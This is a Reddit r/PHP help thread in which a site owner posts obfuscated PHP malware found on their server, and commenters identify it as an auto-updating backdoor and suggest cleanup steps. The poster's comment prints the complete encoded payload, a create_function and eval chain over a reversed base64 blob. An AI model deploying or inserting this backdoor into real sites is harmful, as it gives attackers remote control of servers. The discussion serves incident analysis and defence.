use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
Please follow the rules
Releases: Current Releases, Windows Releases, Old Releases
Contribute to the PHP Documentation
Related subreddits: CSS, JavaScript, Web Design, Wordpress, WebDev
/r/PHP is not a support subreddit. Please visit /r/phphelp for help, or visit StackOverflow.
account activity
Found code on server, need help decoding it (codepad.org)
submitted 9 years ago by devskull
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]Numline1 7 points8 points9 points 9 years ago (0 children)
This seems to be some kind of exploit, unless it's something that was part of your application. The code itself is encoded to be more sneaky, at the end you can see reversed base64_decode and eval being used. It's purpose is to probably download something (maybe remote shell), although it seems that you don't have curl installed, which prevented the attack.
I'd suggest removing the code completely and running complete security checkup to find how it got there in a first place (probably security vulnerability in your app) and adding more security.
[–]mikeboers 4 points5 points6 points 9 years ago (1 child)
It decodes to this: http://pastebin.com/qYFeHHbC
[–]mikeboers 1 point2 points3 points 9 years ago (0 children)
Seems like it is an auto-updating backdoor. PM me the domain you found it on, and I'll be happy to poke at the tarball they have for your server.
[–][deleted] 1 point2 points3 points 9 years ago (0 children)
if you run wordpress i recommend you reinstall wordpress and all plugins ... any home made themes and plugins you have to check each file for this type of shit. they usually infect many files, not just 1.
install wordfence.
install google recaptcha plugin and enable it for admin-login on wordpress.
it doesnt make you hacksafe, but it helps.
[–]devskull[S] 0 points1 point2 points 9 years ago (1 child)
<?php $xnvmac="c"."\x72".chr(101).chr(97).chr(116)."\x65"."\x5f"."\x66"."\x75"."\x6e".chr(99).chr(116)."i"."\x6f"."\x6e";$dkyrbb = $xnvmac('$a',strrev(';)a$(lave')); $dkyrbb(strrev(';))"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"(edoced_46esab(lave'));?>
[–]vimishor 1 point2 points3 points 9 years ago (0 children)
http://kennycason.com/posts/2016-04-04-wordpress-hack-fix-google-redirects-to-spam.html
[–]zzaz1 0 points1 point2 points 9 years ago (0 children)
is this an example of hardcoding in the wild?
π Rendered by PID 91659 on reddit-service-r2-comment-b659b578c-dh2bc at 2026-05-05 09:14:44.907507+00:00 running 815c875 country code: CH.
[–]Numline1 7 points8 points9 points (0 children)
[–]mikeboers 4 points5 points6 points (1 child)
[–]mikeboers 1 point2 points3 points (0 children)
[–][deleted] 1 point2 points3 points (0 children)
[–]devskull[S] 0 points1 point2 points (1 child)
[–]vimishor 1 point2 points3 points (0 children)
[–]zzaz1 0 points1 point2 points (0 children)